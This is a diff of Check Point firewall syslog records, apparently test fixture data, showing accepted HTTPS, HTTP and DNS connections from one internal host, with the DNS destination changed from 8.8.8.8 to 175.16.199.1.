 <134>1 2020-03-29T16:57:24Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d374,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"52.50.107.92"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"35246"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:57:24Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d374,0x1,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501044"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"36804"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:57:24Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d374,0x1,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501044"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"36804"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:57:24Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d374,0x2,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"8"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"185.33.223.206"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"41264"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:57:24Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d374,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"9"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"172.217.17.130"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"34362"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:57:24Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d374,0x1,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"10"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501044"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"46991"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:57:24Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d374,0x1,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"10"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501044"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"46991"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:57:24Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d374,0x4,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"11"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"172.217.17.67"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"51992"; service:"80"; service_id:"http"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:57:24Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d374,0x2,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"12"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501044"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60554"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:57:24Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d374,0x5,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"13"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501044"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33125"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:57:24Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d374,0x2,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"12"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501044"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60554"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:57:24Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d374,0x5,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"13"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501044"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33125"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:57:24Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d374,0x6,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"14"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"13.49.27.73"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"42782"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:57:24Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d374,0x7,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"15"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501044"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43497"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:57:24Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d374,0x7,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"15"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501044"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43497"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:57:24Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d374,0x8,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"16"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"172.217.17.34"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"54060"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:57:24Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d374,0x3,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"17"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"23.100.50.51"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"36466"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:57:24Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d374,0x4,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"18"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"185.33.223.206"; log_delay:"1585501044"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"41276"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:57:24Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d374,0x9,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"19"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501044"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37748"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:57:24Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d374,0x3,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"20"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501044"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"50749"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:57:24Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d374,0x4,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"21"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501044"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37993"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:57:24Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d374,0xa,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"22"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501044"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"34744"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:57:24Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d374,0x9,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"19"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501044"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37748"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:57:24Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d374,0x3,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"20"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501044"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"50749"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:57:24Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d374,0x4,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"21"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501044"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37993"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:57:24Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d374,0xa,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"22"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501044"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"34744"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:57:24Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d374,0xb,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"23"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"104.26.6.155"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"58408"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:57:24Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d374,0xc,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"24"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501044"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"54681"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:57:24Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d374,0xc,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"24"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501044"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"54681"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:57:24Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d374,0xd,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"25"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"99.86.116.26"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"36312"; service:"443"; service_id:"https"; src:"192.168.2.2"]
